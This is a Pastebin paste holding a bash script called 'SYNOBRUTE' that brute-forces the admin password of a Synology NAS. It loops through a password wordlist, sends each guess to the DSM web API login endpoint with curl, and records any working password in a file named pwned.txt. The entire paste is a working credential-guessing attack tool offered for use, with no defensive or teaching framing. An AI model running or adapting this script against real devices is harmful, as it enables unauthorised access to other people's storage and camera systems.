Guest User

brute force synology

a guest
Jul 29th, 2019
333
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2. echo "███████╗██╗ ██╗███╗ ██╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗████████╗███████╗"
  3. echo "██╔════╝╚██╗ ██╔╝████╗ ██║██╔═══██╗██╔══██╗██╔══██╗██║ ██║╚══██╔══╝██╔════╝"
  4. echo "███████╗ ╚████╔╝ ██╔██╗ ██║██║ ██║██████╔╝██████╔╝██║ ██║ ██║ █████╗ "
  5. echo "╚════██║ ╚██╔╝ ██║╚██╗██║██║ ██║██╔══██╗██╔══██╗██║ ██║ ██║ ██╔══╝ "
  6. echo "███████║ ██║ ██║ ╚████║╚██████╔╝██████╔╝██║ ██║╚██████╔╝ ██║ ███████╗"
  7. echo "╚══════╝ ╚═╝ ╚═╝ ╚═══╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚══════╝"
  8. echo " "
  9. echo "SYNOBRUTE - evolutio - 2018"
  10.  
  11. date
  12. echo ""
  13. echo " ./bruteforce.sh password.txt 192.168.1.101"
  14. echo ""
  15. cat $1 | while read output
  16. do
  17. [[ -z "$1" ]] && { echo "Parameter 1 is empty - fichier.txt " ; exit 1; }
  18. [[ -z "$2" ]] && { echo "Parameter 2 is empty - ip_adress_nas " ; exit 1; }
  19. echo "tentative avec le mot de passe $output sur $2"
  20. syno_user="admin"
  21. syno_pwd=$output
  22. syno_url=$2 # eg 192.168.1.100
  23. vAuth=2
  24. touch pwned.txt
  25. # Get Paths (recommended by Synology for further update)
  26. curlResult=$(curl -s "http://${syno_url}:5000/webapi/query.cgi?api=SYNO.API.Info&method=Query&version=1&query=SYNO.API.Auth,SYNO.SurveillanceStation.Camera")
  27. authPath=$(echo "$curlResult" | jq -r '.["data"]["SYNO.API.Auth"]["path"]')
  28. # login
  29. curlResult=$(curl -s "http://${syno_url}:5000/webapi/${authPath}?api=SYNO.API.Auth&method=Login&version=${vAuth}&account=${syno_user}&passwd=${syno_pwd}&session=SurveillanceStation&format=sid")
  30. if [[ $(echo "$curlResult" | jq -r '.["success"]') == 'true' ]]; then
  31. echo -e "\033[32m ----------------------------------- \033[0m"
  32. echo -e "\033[32m succes login for $syno_url \033[0m"
  33. echo -e "\033[32m ----------------------------------- \033[0m"
  34. echo ""
  35. echo "login is admin $output" >> pwned.txt
  36. exit 0
  37. fi
  38. if [[ $(echo "$curlResult" | jq -r '.["success"]') == 'false' ]]; then
  39. echo -e "\033[31mError on login : bad password !!! \033[0m"
  40. echo ""
  41. else
  42. echo -e "\033[31mError on login \033[0m"
  43. echo ""
  44. fi
  45. SID=$(echo "$curlResult" | jq -r '.["data"]["sid"]')
  46. curl -s "http://${syno_url}:5000/webapi/${authPath}?api=SYNO.API.Auth&method=Logout&version=${vAuth}&_sid=${SID}" > /dev/null 2>&1
  47. done
RAW Paste Data